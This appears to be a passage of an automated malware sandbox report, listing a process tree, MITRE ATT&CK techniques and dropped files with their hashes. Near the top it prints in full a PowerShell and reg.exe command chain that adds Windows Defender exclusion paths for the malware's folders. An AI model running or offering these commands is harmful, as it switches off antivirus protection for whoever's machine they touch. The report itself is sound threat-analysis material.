                                                                                                                                                                                                                                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DFQqruzGU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DFQqruzGU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HYNzChQHGFrAC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HYNzChQHGFrAC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PUGYXcoPCHPXWVCkzFR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PUGYXcoPCHPXWVCkzFR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cAMurkQLpHHU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cAMurkQLpHHU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xaDtwvIgttUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xaDtwvIgttUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UTyLZXhmVkbFYLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UTyLZXhmVkbFYLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BInNSjlobDuvYZgQA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BInNSjlobDuvYZgQA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LvGkdVHMKJDKYieT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LvGkdVHMKJDKYieT\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:5064
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DFQqruzGU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:3692
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DFQqruzGU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:4112
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DFQqruzGU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:5440
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HYNzChQHGFrAC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:6068
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HYNzChQHGFrAC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:6372
                                                                                                                                                                                                                                                                          • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                                            C:\Windows\system32\AUDIODG.EXE 0x444 0x4fc
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:6676

                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                            Execution

                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                            Modify Existing Service

                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                            T1031

                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1060

                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                            Disabling Security Tools

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1089

                                                                                                                                                                                                                                                                            File Permissions Modification

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1222

                                                                                                                                                                                                                                                                            Credential Access

                                                                                                                                                                                                                                                                            Credentials in Files

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1081

                                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                                                                            Collection

                                                                                                                                                                                                                                                                            Data from Local System

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1005

                                                                                                                                                                                                                                                                            Command and Control

                                                                                                                                                                                                                                                                            Web Service

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1102

                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                            • C:\Program Files\Uninstall Information\BPQFYLXAWI\poweroff.exe
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              838KB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              c0538198613d60407c75c54c55e69d91

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              a2d713a098bc7b6d245c428dcdeb5614af3b8edd

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              c23f223e4d981eb0e24cadae9dc0c60e40e12ff220d95c9dd2a5b6220fa6d6ed

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              121f882471cd14752a1f806472c89028cc56c90fbfb0b645c26937c417f107d5324250f783310032d4526018c8918cdd06c52325949f78220a9d3bab167e3529

                                                                                                                                                                                                                                                                            • C:\Program Files\Uninstall Information\BPQFYLXAWI\poweroff.exe
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              838KB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              c0538198613d60407c75c54c55e69d91

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              a2d713a098bc7b6d245c428dcdeb5614af3b8edd

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              c23f223e4d981eb0e24cadae9dc0c60e40e12ff220d95c9dd2a5b6220fa6d6ed

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              121f882471cd14752a1f806472c89028cc56c90fbfb0b645c26937c417f107d5324250f783310032d4526018c8918cdd06c52325949f78220a9d3bab167e3529

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              2KB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              eba45bc75daf7421d4767f04582068ca

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              e2d2b46d3780a8b7cdde6e542430f0da28684ce8

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              87f79123a6048371f5e4eccca848509ff8315dea4be740c8480fe945c02b4f38

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              0c081c029224806b1f1f200da673a9554e5d40756736f9ca8bc073c25703092c6d1e72a2fd971b41bedeba26e6ca9fa85486df39f852505925a49d8b94e0e330

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              4f74b1c3f52834fb5d5d0946410f286a

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              e8b1734733535d236f422c282271e97b784b5261

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              56b6f9f565e620e3cc377ac2265180c96efff2844f11cbb229eef977327869f1

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              b84101ebe8570b2f0ecbefafcf58b941100ac6efc9cbbfc711e57bedf6cb6fc62141bd2d66c34f4b316568948ff6448c96ddef2cfde625965a9ea5968beefb2c

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              488B

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              292c1c15b5de087b8347faf73c0ef1ee

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              2b7b3795189b7be7b728c3ad604dc4dbb159f790

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              3817aa45f21c183cc217228fe3b1712f96cb544d23daee2ed559d2416db81b69

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              4acaeb7afdb3310c0b6037c6d939977a96bf9e460a6112cd36d94268e731289375b701ca9ea1caf6fc6314c0582cf681f8d7ca220190db0fada4c3c8f2894b16

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              396B

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              6d0c3a5b1ee4ccf24d4ff29d8d688d7d

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              1c4d3c1f8b2bf5c9f83026abadf204e56256f3f8

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              b2b4894af945c577b7000c00ce1ae4156763ea747558101f83a751d5645e29ec

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              92a17caebf0efa4c88f5dc47e78450f58840e2be4f565a540bd655dd4a31fec32acc51927dd6e3eb9076027f00bd74738cff992376026f981504676dcb9b82d4

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\2aaa4df3-5c8d-4c6c-8000-752569a3f998\build.exe.exe
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              859KB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              b928a3c483047a757995aeb4bd856fb8

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              10492535ba5c73134310edc991e1cce5cc496ae9

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              a137ef69c31ccb16b44e956b49a71361b8ad50c06d82b508032239b573677f4d

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              20b8f64fab9b2d362fc3ce14a6298777038bd32a2e6c7fcc1ffe980c03da7e966f10f5b7560262bfcb829664a26f445c94184367f2c713993bfcc68b79a3ebe9

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\2d9a39d2-8803-440a-8fc4-74caf8df5cea\build2.exe
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              438KB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              2f3d0323ba962334ef87ed098ad02289

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              5b4c70e331af83eaf384f45a01e322b094353375

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              12a51367c5c85ff3c1dc73743cface2e01accecf2879a36adbddf566d52987b3

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              1e33ace1068f614bfac35aa67733c2806328b586be273a611409df87be03c5edc9e312ab213004c8fab71453ef5e34e474d9273c4a97d95d135c18f440674ad3

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\2d9a39d2-8803-440a-8fc4-74caf8df5cea\build2.exe
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              438KB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              2f3d0323ba962334ef87ed098ad02289

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              5b4c70e331af83eaf384f45a01e322b094353375

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              12a51367c5c85ff3c1dc73743cface2e01accecf2879a36adbddf566d52987b3

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              1e33ace1068f614bfac35aa67733c2806328b586be273a611409df87be03c5edc9e312ab213004c8fab71453ef5e34e474d9273c4a97d95d135c18f440674ad3

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5VNCVdQR.CPl
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              83.6MB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              9717b0e7617f9e157aeb3036e9616e36

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              4afa7c42906ad1f2ca669000232fc38e59b27920

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              88924d2c3ebf32ee3d0c2bd632798312ed82f2f5a3ae58478baa8b52c19285fc

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              465717ed6f6aa823f663576eee99c99788a094041eb9d4fe4ab42c5e34b6e711037b4258bf09d2af9dbdc6df24b80b8388b084535d58fc85183a518a512ab424

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5VNCVdQR.cpl
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              86.0MB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              eed0bd2ebb0d60c7c7e70d6a7334e1d0

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              62a408335397495f8be88302145090af7e9d5a55

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              1ce890070f17b3d7bbae37d279f922341d2272612c1bab89ee1b7d440b0486ff

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              ab558c67dc409ad961bf8f9b61696ca6b7fc7a332cacfb84da543bd360daa32b82bdfe0ba304815dbd6c0f24e4ad61fc8bfeb4e4e51ef97ecb684c08a1c2cd45

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5VNCVdQR.cpl
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              86.5MB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              e48d85dac695a336c2971756aca513e9

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              18bb82e98c70d707c303d9ad68c5cdbd2e726d96

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              efb41fd8642625c628da9145629887dce28624d60cb7abcf04f13ac496d8ab71

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              19ca3cc01113f613e3c702f886a86013c348326cb6f793b2602fd7e19150e6ab113fc7e53c3a40f84dca5fc32d8297a3066834a7051a09e3036eaaae06ddf0a1

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7d-f6b2a-e3a-8ca8b-d86b09b7bedf3\Tukeshaemexo.exe
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              324KB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              55f9c8c226d3f434d9518522123c3201

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              17e8b2629c9ab9122500ecf8802828d894b4aa39

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              0869692793e8940ae58615f19957da715c053e7f3e1d5f2aa7d64ea2a9bb077b

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              886cd1f6677572abb54b8ec8fa9f2936b895b04fa888df75013dae22ba3e211c1db2271da9b1caad40d8f36e0e29ea8a0ca11e883f6f37938d948f36fe3a8d18

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7d-f6b2a-e3a-8ca8b-d86b09b7bedf3\Tukeshaemexo.exe
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              324KB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              55f9c8c226d3f434d9518522123c3201

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              17e8b2629c9ab9122500ecf8802828d894b4aa39

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              0869692793e8940ae58615f19957da715c053e7f3e1d5f2aa7d64ea2a9bb077b

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              886cd1f6677572abb54b8ec8fa9f2936b895b04fa888df75013dae22ba3e211c1db2271da9b1caad40d8f36e0e29ea8a0ca11e883f6f37938d948f36fe3a8d18

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7d-f6b2a-e3a-8ca8b-d86b09b7bedf3\Tukeshaemexo.exe.config
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              98d2687aec923f98c37f7cda8de0eb19

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS5237.tmp\Install.exe
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              6.8MB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              3914ad6061cdb09ade58320aa0f5a4a1

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              2ee210ac01e55a54a282ba67a87e4e72ea023f8a

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              f50e0f95bdb02f9582abf6a74df87ab41550fa8fa82d28cf8924e4963e3df297

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              02d56ed137846facb58a52107bf44cafd31cc771492814f99149bacb399e31c40c2e81161f3be2e48bae738ce2cf6e9e15f91eae6bee8b883b1fdf0047768377

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS5237.tmp\Install.exe
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              6.8MB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              3914ad6061cdb09ade58320aa0f5a4a1

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              2ee210ac01e55a54a282ba67a87e4e72ea023f8a

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              f50e0f95bdb02f9582abf6a74df87ab41550fa8fa82d28cf8924e4963e3df297

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              02d56ed137846facb58a52107bf44cafd31cc771492814f99149bacb399e31c40c2e81161f3be2e48bae738ce2cf6e9e15f91eae6bee8b883b1fdf0047768377

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS58E.tmp\Install.exe
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              6.3MB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              bb1bc57d6d77d1820baa0b2f2202bfc2

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              ededf38046ea50a3283c6e24618bea36dd7fc888

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              e48f064091be84300399ea45d97c048c22ff28312268bbb6304afc11b9c04d4e

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              d06c97b2517ef1b00cf1deadbf880cd8c62050980355a5d12c718f018cc54243c0235bff4e8cf73e39fa93b7e8df28cbaa9a20939d363c6cfe092e80099c0373

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS58E.tmp\Install.exe
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              6.3MB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              bb1bc57d6d77d1820baa0b2f2202bfc2

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              ededf38046ea50a3283c6e24618bea36dd7fc888

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              e48f064091be84300399ea45d97c048c22ff28312268bbb6304afc11b9c04d4e

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              d06c97b2517ef1b00cf1deadbf880cd8c62050980355a5d12c718f018cc54243c0235bff4e8cf73e39fa93b7e8df28cbaa9a20939d363c6cfe092e80099c0373

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Nell.vst
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              44c400dcd4a04a7e9d92cbf701dc8dd3

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              3d403e7d512c1bafe096cf194f985fbcf63acfae

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              b9a2d76b7822428f6c8a6ebe4738ce10f64b3fa4d3768f2a35aa0cf69aa5d035

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              e778d9b4351b154ddf6e594e6ceaaffc2784927ddb013e7505b3569278ab3e58cb7baa6d6f1fc479af2956ea51f0d88ab1cc7a3d1853dfaf0be56e1f5c37d6e2

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Calore.sldm
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              9KB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              8d3e1239e664dcb8f43adb6ccd0778c7

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              8a4efdf95f637a7d8af58ce79e37dbda47a09b46

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              8365b7b98c5c569b94a9a6783e7ab0f5242dc77bda1c22a59d063ca29ed21b58

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              2570c993a52fa6c064170fa3cbb8cb7f99e404322ed9d9c3ccfc001537cee53848fa70a1c90161d7930771ade6d63b12f89d93a38c28023a480c3ff480431fe6

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\f8-fdad3-38f-f469e-334ea73ed6146\Wovaevyrufe.exe
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              435KB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              78ace771addfcc39028bd3216e1f9dff

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              b1c3ef0ec4193cb6ccb7be1612551008b1a1dec3

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              944bba57cbfeecdfd9fa1c0a61681fdcf5f1cca885a66bde958107e18d786bdd

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              876e49031c59f159774e4cbdd22388dfef1f66afb7b2ac8ebfc42f991c824cee7b0202be3663babaac00fadb649f589bfd518ab7c119a8962b9f5034504fbf52

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\f8-fdad3-38f-f469e-334ea73ed6146\Wovaevyrufe.exe
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              435KB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              78ace771addfcc39028bd3216e1f9dff

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              b1c3ef0ec4193cb6ccb7be1612551008b1a1dec3

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              944bba57cbfeecdfd9fa1c0a61681fdcf5f1cca885a66bde958107e18d786bdd

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              876e49031c59f159774e4cbdd22388dfef1f66afb7b2ac8ebfc42f991c824cee7b0202be3663babaac00fadb649f589bfd518ab7c119a8962b9f5034504fbf52

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\f8-fdad3-38f-f469e-334ea73ed6146\Wovaevyrufe.exe.config
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              98d2687aec923f98c37f7cda8de0eb19

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-05791.tmp\PEInjector.dll
                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              186KB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              a4cf124b21795dfd382c12422fd901ca

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              7e2832f3b8b8e06ae594558d81416e96a81d3898

                                                                                                                                                                                                                                                                              SHA256

